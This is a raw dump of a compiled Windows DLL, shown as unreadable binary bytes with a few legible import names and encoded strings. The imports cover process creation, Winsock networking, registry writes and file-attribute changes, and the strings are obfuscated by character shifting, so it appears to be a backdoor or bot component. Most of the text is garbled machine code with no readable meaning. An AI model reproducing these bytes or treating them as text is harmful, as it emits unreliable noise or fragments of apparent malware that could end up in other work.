MZ�       ��  �       @                                   �   � �	�!�L�!This program cannot be run in DOS mode.
$       �2�j�S�9�S�9�S�9p�9�S�9�[�9�S�9c[�9�S�9�S�9�S�9�_�9�S�9�_�9�S�9Rich�S�9                        PE  L ��C        � !
 R   $             p                          �                                      4q  x                            �  �                                                   p  �                           .text   �Q      R                    `.rdata  N   p      V              @  @.data   �   �      \              @  �.reloc  �   �      `              @  B                                                                                                                                                                                                                                                                                                                                                                                                        U����M��  �E�P��+  ���M��  j �M�Qj j j j j �*  ���J  �M��9  P�M��0  P��p P��J  ���M��x  �M��p  ��]�������������U���  W�E�p� �  ��'  �I  �Z����q ��������   3��������f��������R� ,  ��j��x���P������Q��p �t� �   ���v  ��  �������������  j j j ������Pj j j �')  ���������I  P��p ��������������t�����t�����L  ��t�����t�����   ��t����$�v ������i�`�  Q�xp �������F  �O����������6  �?���������i�`�  R�xp �������  ������x�����   ��x���P�*  ����x����  P�I  ����x�����   ��������   �����������i�`�  Q�xp �������   ����������i�`�  R�xp �������   �����������t   �}���_��]�| � � �  > ��U��t� P��p ]����������������U��Q�M��E��     �M��A    �E���]����������������U��Q�M��E��Q�N  ����]��������U����E�E��}�t��M�Qj �URh� j j �|p �   ��]� ��������U����M��} �M���  �EP�M��R�  ���E��E��M���U��E�B��]� �������������U��Q�M��E�P�M�]  �E���]� ����U����M�E�H�M��U�BE�E��M�Q�M��f����UR�EP�M�U�R�0  ����]� �������U��Q�M��M�QJ  P�M�h  P�M�������]� ���������U��Q�M��M�!J  P�M�8  P�M��_�����]� ���������U��Q�M��M��   �E�M����E�M��Q�P�E��     �M��A    ��]� ��U��Q�M��M��   �E��M��U��E�B��]� ����������U����M��E���M��U��    �E��@    �E���]������U��Q�M��M��QI  P�M�(����M��@I  P�M��W   P�M�N   P��
  ����]� ���������������U��Q�M��E��Q��	  ���U��    �E��@    ��]�����U��Q�M��E�� ��]�U����  Wǅ,���    ���,�������,����MQ�tp 9�,���}�U�,�������M�,�����Êq �������   3�������f���q ��0�����   3���1����f���MQ�tp %  �yH���@��uQ�UR�tp �+�����(�����(���P�MQ�����R�	  ����(���P�M�(���Q��0���R�	  ���m�EP�tp �+�����$�����$�������$�����$���R�EP�����Q�\	  ����$������� ����� ���P�M�$���Q��0���R�-	  ��ǅ���    ǅ���    ǅ���    ��������������MQ�tp 9����}l�������  �yJ���B��u)�E����������������������������'�M�����������0�����������������s���_��]���������U��h � �������h� �������h� ������h� ������h� ������h � ������h,� ������h@� �x�����hD� �k�����hP� �^�����hX� �Q�����h� hX� �Hp h�� �4�����hĀ �'�����h̀ ������hԀ ������h� � �����h� �������hH� �������h�� �������hā �������hȁ ������h܁ ������h� ������h� ������h� ������h$� �~�����h0� �q�����hD� �d�����hL� �W�����hX� �J�����hd� �=�����]���������U����E�   j�L  ���E�jj �E�P�Y  ��jjj��p �M���U�Rh~f��E��Q��p �E���]����������U����E�   j��  ���E�jj �E�P��  ���MQ�UR�EP��p �M���U�Rh~f��E��Q��p �E���]����U��j�E��R��p �E��R��p �E��y t�U��HQ��  ���U��x t�M��BP��  ���M�R�  ���E�     ]���������������U����E�    �	�E����E��M�U�;s�E��M�U�D�;u��؋M�U�;u$�E�8@s�M��U�E� �D��M����E�3�u��U�z tc�E�    �	�E����E��M�U�;s�E��M�U�D�;u��؋M�U�;u$�E�8@s�M��U�E� �D��M����E�3�u���]��������U��Q�EP�M�R�EF  ��u%�E�x t�MQ�U�P�)F  ��u	�E�    ��E�   �E���]�������U���  �EP�M�R��E  ����   j h   �� ���P�M�R��p ������������ 3��  �E�H������U;J~4�E�H�����Q�U�BP��  ���M�A�U�B������M�A������R�� ���P�M�Q�EPR�  ���M�Q������E�P�MQ�U�P�,E  ����   �M�y txj �U�BP�M�QR�E�Q��p ������������ 3��N�U������;B})�M�Q+�����R�E�H�����Q�U�BP�P  ���M�Q+������E�P�   ��]���U��Q�} tD�E�M;H~�U�B�E���M�M��U��U�} t�EP�M�QR�EP�  ���E��M�A��]���������U��Q�E�M;H~�U�B�E���M�M��U��U�} t�} t�EP�M�QR�EP�:  ���} t.�M�U;Q}#�E�H+MQ�U�BEP�M�QR�V  ���E�H+M�U�J�E��]��������������U��E�HM�U;J~.�E�HMQ�U�BP�   ���M�A�U�BE�M�A�} t�UR�EP�M�Q�EPR�~  ���M�QU�E�P]�����������U��Q�EPj �p P�p �E��E���]����������������U��E�EP�������]������������U��} u�EP��������MQ�URj �p P� p ]�U��} u��EPj �p P�$p ]�U��EP�T�����]����������������U��EP������]����������������U����E�E��E�    �	�M����M��U�;Us�E�E��  ���]������������U����E�E��E�    �	�M����M��U�;Us�E�E��M����]����������U����E�E��M�M��E�    �	�U���U�E�;Es�M�M�U�U���݋�]���������������U��Q�E�E��M;Mv�UU9Ur0�E�M���M��t�U�E��
�U���U�E���E���H�M�U�D
��E�M�U�D
��E�M�U���U��t�E�M���E���E�M���M�ҋE���]�����U��3�]����������U���  �} ��   ƅ���� ƅ���� �E�    �E�    �E�    �	�E���E�M�;M}N�U��  �yJ���B��u�EE�M���������E����E���MM�U���������M����M�롋U�R������P�MQ�T������U�R������P�MM�Q�:������E�    �	�U���U�E�;E}�MM�����EE��ً�]����U��� �} �  h   j�������E�h   j�������E��}� t�}� u�Y  �E��  �M�� �E�    �	�U����U��E�;E}�MM�����EE���ًM��  �yI���A��u8�E�+����E�U�R�EP�M�Q�N������U�R�EE�P�M�Q�7������H�E�+����E�U���U�E�P�MQ�U�R�������E���E��M�Q�UU�R�E�P��������E�    �E�    �E�    �	�M����M��U�;U}I�E�%  �yH���@��u�MM��U�U���M���M���UU��E�E��
�U���U�릋E�P�������M�Q��������]��������������U���  ǅ����    �M�������������������������������Rhq ��p���P��p ����������������������R�����P�(p ������Q�tp �������D������������Q������R�(p ������P�tp �������T�������������Qhq ������R��p �����������������������Rh q ������P��p ����������������������R������P������Q�����R��p���P�o  ����]���������U����  Wǅ���    �M�D����������������������������\����������������M��8  ��\�����;�t
� q ��  h  ������RhĀ �Lp ��uh  ������P��p h � ������Q�Hp h�   ������R�Dp h2  ������P������Q��p ��l���j �U�R��\���P�����Q��l���R�@p ��l���P��p j������Q�Dp ��`���R�  ��h�   ��`���P�Dp �#q �������   3�������f��h� �����R�Hp ��`���P�����Q�Hp jD�����R�������ǅ���D   j��p���P������������Q�<p �#4  �.  �����8p ��X�����X�������X�����p���P�����Qj j j j j j �����R������P�4p ��X��� tj �0p j �p� Q�,p _��]������������U����  W�$q ��H�����  3���I����f���%q ��8���3҉�9�����=�����A���ǅ4���    �M�������4�����4�������4�����4����Rh(q ��8���P��p ����4�������4�����4������D�����4�������4����M�@6  ��D�����
;���   ǅ0���    ��0���;�D���}b��4���Q��H���R�Hp h,q ��H���P�Hp ��4���Q�tp ��0����D��0�����4���Q�tp ��4����D��4���됍�H���Q�  ����8���R�  ��_��]���U��M�5  ��u�l� ���@�l� �q �   �M�~������u
��p �   �M�e������u�EP��������p �   �M�?������u�UR��������b�M�!���� ��u�MQ��������q �?�M��������u�l� ���@�l� �q ��l� ���A�l� �q ]������U���T�M�������M�������M�������M�������M�������M������M������M������E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�)  ���l� ��t6�M��#4  P�M������M�4  P�M��)���P�M� ���P�������4�M���3  P�M������M��3  P�M������P�M�����P�������M������P��p �E��:1  �E��q �U��M�����P��p �E��M�����P��p �E�j�M�O����M�g3  P�E�P�M�z���P�������M�������M�������M������M������M������M������M������M�������]��������������U���P  W�E�    h0q �M����P��p �E��}� u3��B  �M������M�+�f�M�f�U�f��f�U��2q ��������   3��������f���M�Q�M����P������R�Pp �E�Ƅ���� �M����M��U�R��p �������E���3��  �M���d~3��  ������ |������   ~3��  �E�    ������R��p �Ẽ}� u3��i  f�E�  3��E҉E։E�f�E�f�E� �M̋Q���M�f������R��p f�E��E�    jjj��p �E��}��u3��  ǅ�����_ ǅ�����_ f�E� f�E�  j�E�Ph�   h��  �M�Q��p �E��}� t�U�R��p 3��  j������Ph  h��  �M�Q��p �E��}� t�U�R��p 3��  j������Ph  h��  �M�Q��p �E��}� t�U�R��p 3��J  f�E�  3��E�E�E�f�E�j ��p �E�f�E� j�M�Q�U�R��p �E��}��u�E�P��p 3���  �E�    �E�    ǅ����    ǅ����    ���������������������;�����s�������������;M�u��͋�����;�����u(������@s�������M����������������������3�u��M�Qj j ������Rj ��p �E��}��u�E�P��p 3��8  j�M�Q�U�R��p �E��}��u�E�P��p 3��  �M�/  P�M����P�@�����j �M�s/  P�M����P�M�Q��p �E��}��u�U�R��p 3��   ǅ����    �E�    ǅ����   �E������P�M�����j ������Q�M�'���E�P�U�R��p �������������u�*�E�������E�M�Q�M�����������t	������ u�j�U�R��p �E�P��p �M�.  P�M����P�Q������   _��]�����U��� �M�������M������E�P�M�Q�������M������U�R�E�P�M�Q�A�������t,�U�R�������E�M������M������M������E��5�l� ���@�l� �q �M��M��l����M��d����M��\����E���]������U��Q�E�    �	�E����E��MQ�tp 9E��UU��5�   �MM���Ћ�]����������������U����E�    �	�E����E��M�`-  9E�}!�M�s���E��E��M����   �E���ɋ�]�������U����M��r����=��  t �E�Ph?  j h� h  ��p �E���M�Qh?  j h� h  ��p �E��E�    �U�R�M������Pj j �EP�M�Q� p �E��U�R�M������E�P�M�����Pj j �MQ�U�R� p �E��E�P��������M�����P�MQ�(p �U�R�p �M��������]����������������U��} t�EPh� ��������} t�MQh$� ��������} t�URh0� ��������} t�EPhD� �������} t�MQhL� �������} t�URhX� �������}  t�E Phā �o�����]�����������U��EPhd� �O�����]�����������U����  �=��  t-�E�P�����Qj h?  j j j h� h  ��p �E��+�U�R�����Pj h?  j j j h� h  ��p �E������Q�UR�&������EP�tp ��P�����Qjj hd� �����R�p �E������P�p ��]�����U����  �=��  t-�E�P�����Qj h?  j j j h� h  ��p �E��+�U�R�����Pj h?  j j j h� h  ��p �E������Q�UR�f������EP�tp ��P�����Qjj hL� �����R�p �E������P�p ��]�����U����  �=��  t-�E�P�����Qj h?  j j j h� h  ��p �E��+�U�R�����Pj h?  j j j h� h  ��p �E������Q�UR�������EP�tp ��P�����Qjj h� �����R�p �E������P�MQ�e������UR�tp ��P�����Pjj h$� �����Q�p �E������R�EP�$������MQ�tp ��P�����Rjj h0� �����P�p �E������Q�UR��������EP�tp ��P�����Qjj hD� �����R�p �E������P�MQ�������UR�tp ��P�����Pjj hX� �����Q�p �E������R�EP�a������MQ�tp ��P�����Rjj hā �����P�p �E������Q�p ��]����������������U����   ����   �=��  t �M�Qh?  j h� h  ��p �E���U�Rh?  j h� h  ��p �E�h�� �tp �E��E�Ph�� jj hԀ �M�Q�p �E�U�R�p h�� h|� hp� h�� h�� h�� �<�����h�� ������h�� �b������=��  t���     j �Tp j�xp ������]����U����=��  t �E�Ph?  j h� h  ��p �E���M�Qh?  j h� h  ��p �E��E�  �U�Rh�� j j hԀ �E�P� p �E��M�Q�p ��]����������������U��Qh�� h|� h�� hp� h�� h�� h�� ��������E�    h̀ h�� ��p �E�h�� �m�������]�������U����E�Ph?  j hȁ h  ��p �E�}� t���     �
���    �M�Q�p �=��  t*�U�R�E�Pj h?  j j j h� h  ��p �E��(�M�Q�U�Rj h?  j j j h� h  ��p �E�E�P�p �M�Qh?  j h�� h  ��p �E�}� u9�E�   j�U�Rjj h܁ �E�P�p j�M�Qjj h� �U�R�p �E�P�p �M�Qh?  j hH� h  ��p �E�}� u �E�    j�U�Rjj h� �E�P�p �M�Q�p �����2���j �Xp �E�    h�� j �U�Rh�6 j j �|p ��� ��]�U��=��  t&���    j���� P�\p ��t
���     ]�������������U��} t6h�� �tp ��P�M������M��#  Ph�� �M�����P�������} t6h�� �tp ��P�M�����M�#  Ph�� �M����P�X������} t6h�� �tp ��P�M�X����M�p#  Ph�� �M����P�������} t6hp� �tp ��P�M�����M�4#  Php� �M�F���P��������} t6h�� �tp ��P�M������M��"  Ph�� �M�
���P�������} t6h|� �tp ��P�M�����M�"  Ph|� �M�����P�h������}  t6h�� �tp ��P�M �h����M �"  Ph�� �M ����P�,�����]��������U��h�� �tp ��P�M�&����M�>"  Ph�� �M�P���P�������]������U��EPh�� �(p ]�������������U��EPh�� �(p ]�������������U��EPh�� �(p �MQh�� �(p �URh�� �(p �EPhp� �(p �MQh|� �(p ]�U��h�� �tp ��~!h�� �EP�(p �MQ�tp �U�D� ]�����������U��Qh�� �dp �E�    �	�E����E��� �$!  9E�}o�M�Q�� �P"  �U�@;BuP�M�Q�� �6"  ������   ;� }/�UR�E�P�� �"  �����'  h�� �`p �   ��x���h�� �`p 3���]����������������U����} u��   �E��9 u��   �E�   �U�R�E�P�M��P��p �E�    �	�M���M�� �6   9E�}~�E�    �	�U���U�E�P�� �P!  �����   9E�}I�M�Q�U�R�� �.!  �����4#  �M�� ;u�M�Q�U�R�� �!  �����  ���i����EP�j�������]����U���8�EP�tp ��u�c  �M�M��E�    h � �U�R��p �EԋE�+EȉE��M�Q�U�R�E�P�������M��D� �UԉUȋEȃ��E�h � �M�Q��p �EԋU�+UȉU��E�P�M�Q�U�R��������E��D� �MԉMȋUȃ��U�h � �E�P��p �EԋM�+MȉM��U�R�E�P�M�Q�������U��D� �EԉEȋMȃ��MȋU�R�tp �E��E�P�M�Q�U�R�J������E��D� �M��  �M�Q��p �E܍U�R��p �EݍE�P��p �EލM�Q��p �EߍM��  �U�R�� �L  �M���  ��]�U��� �EP�tp ��u�q�M�M��E�    h� �U�R��p �E��}� u�J�E�+E��E��M�Q�U�R�E�P�������M��D� �U�R�������E��E�h� �tp E��E�땋�]������U���x  ǅ���   �E��M��E��E� ƅ����ƅ���� ƅ���� ƅ����ǅ����    fǅ ���  jjj��p �����������Rh~f�������P��p fǅ���� f�M�Q��p f������ǅ����    j������R������P��p ��t�  h���������Q��p �   ���a  ǅ����    ǅ����    ǅ����    ǅ����    ���������������������;�����s�������������;�����u��ʋ�����;�����u+������@s"���������������������������������3�u��=��  �+  j������P��p ������Q��p ǅ���    ������������������;З ��   �����k�̗ Q�����������k��̗ �LQ�M����������k��̗ �< ��   �����k��̗ �|
 uj�З ��9����}>�З +������k�Q�����k��̗ �LQ�����k�̗ R�!������З ���З �������������������     j �Tp ǅ���    ������������������;З �  �����k��̗ �D
����������������������������  ��������!Z �$�Z �����k��̗ �<
 t(������P������Q�����k��̗ �Q�k����������k��̗ �| t*������Q������R�����k��̗ �TR�,������>  ǅ����    ���������������������;�����s'�����k��̗ �L�������������;u�뼋�����;�����u9������@s0�����k��̗ �L����������������������������3��a���ǅ����    ���������������������;�����s'�����k��̗ �L�������������;u�뼋�����;�����u9������@s0�����k��̗ �L����������������������������3��a��������ǅ����
   ǅ����'  ������P������Q������R������Pj ��p ǅ���    ������������������;З ��  �����k��̗ �T����������������������������  �������$�(Z �����k��̗ �< t]������Q������R�����k��̗ �R�0�������t�����k��̗ ��z u�����k�̗ P������������k��̗ �|
 t`������P������Q�����k��̗ �LQ��������t�����k��̗ �L�y u�����k��̗ �LQ������������k��̗ �< ��   �����k��̗ �|
 uj�З ��9����}>�З +������k�Q�����k��̗ �LQ�����k�̗ R�������З ���З ��������������  ������R������P�����k��̗ �
P�p�������u�  ������Q������R�����k��̗ �R��������u4�����k�̗ P�r����������k��̗ �D
�����\  �����k��̗ ��z�	  �����k��̗ ��B�����  �����k��̗ ��QR�����P�����k��̗ �
P������fǅ���� �����������f��
���f�������G��������k��̗ �D
j������P�����k��̗ �D
�Q��p ������������ ��   ��p ������������3'  u�����k��̗ �D   �a�����k��̗ �D
P�s�����ƅ����[j������Q�����k��̗ �Q�i����������k��̗ �D������  �   ƅ����Zǅ����   ������Q������R�����k��̗ �T�P��p ������������f������f������j������P�����k��̗ �
P�������ǅ����    fǅ����  �����k��̗ �D
   �7  �����k��̗ ��z|Q�����k��̗ ��B���t4�����k�̗ R������������k��̗ �D������  �����k��̗ ��y��   �����k��̗ ������k��̗ ��B�P��9Q|q�����k��̗ ��B�H��Qj �����k��̗ �Q������j�U�R�����k��̗ �R�����������k��̗ �D   �  ������R������P�����k��̗ �
P��������u��  ������Q������R�����k��̗ �R��������u4�����k�̗ P�����������k��̗ �D
�����y  �����k��̗ ��z|Q�����k��̗ ��B���t4�����k�̗ R�&����������k��̗ �D�����  �����k��̗ ��y|b�����k��̗ ��Q�B��tEƅ����j
������Q�����k��̗ �Q�����������k��̗ �D�����  �����k��̗ �
�x�t  �����k��̗ �
�H�Q���R  �������%��������k��̗ ��BP�����������������  P����������P�����k��̗ �
P������������������H������������R�������z�����P������P�
�����������Ƅ���� j�������L����������DP������Q�������ǅ����    ������R��p ������������ tD����������k��̗ �D
fǅ���� �������H��������f������f�������Rƅ����j
������R�����k��̗ �R�`����������k��̗ �D�����������������	  j������R�����k��̗ �T�P��p ������������ ��   ��p ������������3'  u�����k��̗ �D
   �   �����k��̗ �TR������������������������C'  t������M'  t�ƅ�����ƅ�����ƅ����j
������Q�����k��̗ �Q�O����������k��̗ �D����������������  �   ƅ���� ǅ����   ������Q������R�����k��̗ �T�P��p ������������f������f�� ���j
������P�����k��̗ �
P������ǅ����    fǅ ���  �����k��̗ �D
   �����������  �����k��̗ ��z
�  j
������P�����k��̗ �
P������fǅ���� ������������f������f�������&��������k��̗ �D
j������P�����k��̗ �D
�Q��p ������������ ��   ��p ������������3'  u�����k��̗ �D   �   �����k��̗ �D
P�O�����������������������C'  t������M'  t�ƅ�����ƅ�����ƅ����j
������R�����k��̗ �R�����������k��̗ �D�����  �   ƅ���� ǅ����   ������R������P�����k��̗ �D
�Q��p ������������f������f�� ���j
������Q�����k��̗ �Q�s�����ǅ����    fǅ ���  �����k��̗ �D   ��  ������Q�����k��̗ �L�R�  ��u*������P�����k��̗ �D
�Q�  ����  ǅ����   ������R������Ph  h��  �����k��̗ �D
�Q��p �����k��̗ ��Q����  ������ ta�����k��̗ �D
P�S�����ƅ����[j������Q�����k��̗ �Q�I����������k��̗ �D������  ƅ����Zǅ����   ������Q������R�����k��̗ �T�P��p ������������f������f������j������P�����k��̗ �
P������ǅ����    fǅ����  �����k��̗ �D
   �����k��̗ ��B����I  ������ ��   �����k��̗ �LQ�"�����������������������C'  t������M'  t�ƅ�����ƅ�����ƅ����j
������P�����k��̗ �
P������������k��̗ �D
�����Y  ƅ���� ǅ����   ������P������Q�����k��̗ �L�R��p ������������f������f�� ���j
������R�����k��̗ �R�K�����ǅ����    fǅ ���  �����k��̗ �D   �  ������R������P�����k��̗ �
P�3�������u3������Q������R�����k��̗ �TR��������u�R  ������P������Q�����k��̗ �Q�$�������ui�����k�̗ R�����������k��̗ �T�z u�����k��̗ �TR�#����������k��̗ �D�����  ������R������P�����k��̗ �D
P��������ug�����k��̗ �D
P�����������k��̗ �
�x u�����k�̗ Q�=����������k��̗ �D�����(  �����k��̗ �
�x tz�����k��̗ �
�HQ�����k��̗ ��QR�����k��̗ �TR�3����������k��̗ ��BPj �����k��̗ �
P�`����������k��̗ �D
�x t}�����k��̗ �D
�HQ�����k��̗ �L�QR�����k��̗ �R�����������k��̗ �T�BPj �����k��̗ �D
P��������%���������Q������R��  ���  �З ���З �З k�Q�̗ R��������̗ ǅ���   �����P������Q������R�x������З ��k��̗ �
�З ��k��̗ ��P������Q��������t5�З ��k��̗ �D    �З ��k��̗ �D
   �M�З ��k�̗ P�J������З ��k��̗ �D
    �З ��k��̗ �D����������]��C |D �E     fF �X �G �X �K �R 'V ������������U����lp �E��E�3ҹ#  ���  �ܗ h�� �hp j��������E��}� t�M���  �E���E�    �U�� ��]�����������U��=�  t1���    j��� P�\p ��t��     �� �#  ]��U�������h�� �pp �� �E��M��M��}� tj�M��  �E���E�    ��]�������������U���  �E�� �MQ���������h���Rj��p j �Xp �E�Pj hܗ h�@ j j �|p �� ��]����������U��j �Xp h�� �dp �� �O  �EP�f�����h�� �`p ]�������U��ܗ ]�������U��Q�M��M����^   �E���]��������U��Q�M��M����n   ��]�����������U��Q�M��M���  �E��t�M�Q� ������E���]� ����U��Q�M��E��     �M��A    �U��B    �E���]������U��Q�M��M��1  ��]��������������U����M�E�M�P;QuV�E�x u	�E�   ��M�Q��U��E��E��M���Q�U�P�������E��}� u3��8�M�U��Q�E�M���UR�E�HQ�M��  �U�B���M�A�   ��]� ������U��Q�M��} |�E��M;H|3��U�U��B��9Et3�M���U��B+���P�M���E�L�Q�U���M��R�������E��H���U��J�   ��]� ���������U����M��E��8 t6�E�    �	�M����M��U��E�;B}��M��R�%������E��     �M��A    �U��B    ��]��U��Q�M��M���   ��]��������������U��Q�M��E��@��]����������������U����M�E�M�P;QuV�E�x u	�E�   ��M�Q��U��E��E��M�k�Q�U�P�D������E��}� u3��8�M�U��Q�E�M���UR�E�HQ�M��@  �U�B���M�A�   ��]� ������U����M��E��8 tH�E�    �	�M����M��U��E�;B}j �M�k��U�
�`   �؋E��Q�ӿ�����U��    �E��@    �M��A    ��]����������������U��Q�M��Ek��U���]� ��������U��Q�M��M��Q����E��t�M�Q蠿�����E���]� ����U����M��E���U��Pj��  ���E��}� t�MQ�M��l   �E���E�    ��]� ����������U����M��Ek��M�Pj�t  ���E��}� t�UR�M��<   �E���E�    ��]� ����������U��Q�M��E��M���E���]� ������U��Q�M��EP�M��   �E���]� ����U��Q�M��E�M����P�Q�P�Q�@�A�M��Q�M����   �E���]� ��U����M��E��     �M��A    �U��B    �M�"�����P�y������M���U��: tD�M�����M��A�E�    �	�U����U��M�����9E�}�E�P�M�    P�M��'����ӋE���]� ������������U��Q�M��U���M����]� ��������U��E]��%�p                                   �t  �t  �t  �t  �t      �r  �r  s  s  &s  2s  Ns  \s  ns  |s  �s  �s  �r  �s  �s  �s  �s  t  "t  :t  Rt  nt  ~t  �r  �r  �r  �r  �r  �s      ,u  8u      u        �  ��  �  �  �  �  �  �  �  �	  �4  �  �  �o  �  �s  �  �
  �  �    L  M  N  O  P  Q         %d  %d  %d      %d  
   :   �q          �t  p  �q          �t   p  Hr          u  �p  Pr           u  �p  <r          Bu  �p                      �t  �t  �t  �t  �t      �r  �r  s  s  &s  2s  Ns  \s  ns  |s  �s  �s  �r  �s  �s  �s  �s  t  "t  :t  Rt  nt  ~t  �r  �r  �r  �r  �r  �s      ,u  8u      u        �  ��  �  �  �  �  �  �  �  �	  �4  �  �  �o  �  �s  �  �
  �  �    GSleep sOpenFile  . CloseHandle i CreateThread  �lstrlenA  �lstrcatA  HeapAlloc �GetProcessHeap  HeapReAlloc HeapFree  �lstrcpyA  � FreeLibraryAndExitThread  � ExitProcess ` CreateProcessA  �GetVersion  �GetStartupInfoA �WriteFile SetFileAttributesA  �GetWindowsDirectoryA  PGetEnvironmentVariableA �lstrcpynA � ExitThread  SetLastError  �WaitForSingleObject GLeaveCriticalSection  � EnterCriticalSection  InitializeCriticalSection �GetTickCount  z DeleteCriticalSection KERNEL32.dll  �RegCloseKey �RegQueryValueExA  �RegOpenKeyExA �RegSetValueExA  �RegCreateKeyExA ADVAPI32.dll  �wsprintfA USER32.dll  WS2_32.dll  StrToIntA � StrStrA SHLWAPI.dll                                                                                                                                                                                   3   
   aaws    4   4%z %x4%    aNJ5jjKQ53} a~yrxhtyjjXxja{mx3} *x  my?4xyu4*   LYJ%    %YU65MY43                                                                                           Mx?ty%  YRJU    myyu    \stxufjni|Ziy   Xk|wanwxkani|azws[wnsWstyfjRhtty\stxHwjyjxtaz   Xk|wanwxkani|azws[wnsXjqttyfjRhtty\stxHwjyjxtamqGy  XXJatytXy5aj{hxXfjFhxaffjjxKw|qUqhaysfiwkqa^YRHswqj56XwnjamwihjxUwrywanjfqtn~XfiwUtnj   XK\Wanwxkajzn~HsjTYFJRhttyXhwy%jyw  ni  XK\WanwxkTYFJRhtty  Fy[wxnfqSyksnnzIxgjtn~  Kw|qIxgjtn~njfqnfqSyk   JfqKw|qsgjnjfq  {wnsjxt hswqjtytqw  hswqjdfputytqwghz   iq~jf   |njndimydun hsdnntsqry  fwjxiwx                                                                                                                                                                                                                                                                                                                                                                                                                       �   S0�0�0�0�0:1x1�1�1*2M2v2z2~2�2�2�2�2�23)3�5�56$6>6�6+7�7�7�7�7�7�7888)868C8H8N8S8`8m8z8�8�8�8�8�8�8�8�8�8�8	99#909=9J9�9�9�9:/:=:<�<�>�>3?:?S?Z?    �   
44=4J4n4{4�4�4�4�4�5�5�5�5�5�5�5�56'666W6]6z6�6�6�6�6,7=7E7L7k7�7�7�7Y8^8k8x8�8�8�8�8
909t9�9�9�9�9�9�9-:�:�:�:�:r;�;�;�;<Z<�<�<==8=K=o=�=�=�=�=�>�>�>�>�>?c?�?�? 0  �  U0_0e0�0@1S1^1s1~1�1�1�12.2E2\2s2�2�2�2�2�23&3H3S3s3�3�3�3�3�3�34434G4T4d4{4�4�4�4�4�45545H5U5u5�5�5�5�5�5�56686L6Y6i6�6�6�6�6�6�6�6�6�6 77777!7&7+787E7S7\7h7p7�7�7�7�7�7�7�7�7�7888$8)8.838G8L8R8Z8�8�8�8�8�8�8�8�8999+969U9_9n9x9�9�9�9�9�9�9�9�9�9::::):0:::Z:`:z:�:�:�:�:�:�:;;.;J;P;j;�;�;�;�;�;�;<
<$<H<N<h<n<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<==3=G=a=v=�=�=�=�=�=	>!>G>i>�>�>�>�>-?7?s?}?�?�?�? @  �   	00+0L0d0n0�0�0*1I1]1�1�1O2e2r2�2�2�2�2�23313E3S3[3u3�3�3�3�3�34(4B4f4�4�4N5�5�56/6b6p6�6�6�6�67$7<7W7p7|7�7�7�7�7�7858T8l8�8�8�8�8$9@9M9f9�9�9�9�9$:1:c:�:�:�:�:�:;0;A;b;�;�;�;�;<7<O<k<�<�<�<�<�<=1=M=i=�=�=a>�>�>�>?+?D?e?�?�?�?   P  �   I0V0�0�0�01E1a1n1�1�1�1'2B2�2�2�2�2353z3�3�3�3�34?4L4~4�4�4�4T5o5�5�5�56@6m6�6�6�6�6757U7q7�7�7�7�7�7�7838N8g8}8�8�8�8�8999 9M9Y9a9m9�9�9�9�9�9�9�9�9�9 ::::(:,:0:4:8:<:@:X:s:x:~:�:�:�:�:�:�:�:;;;];x;�;�;�;�;�;�;�;�;�;�;�;�;   `     �1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              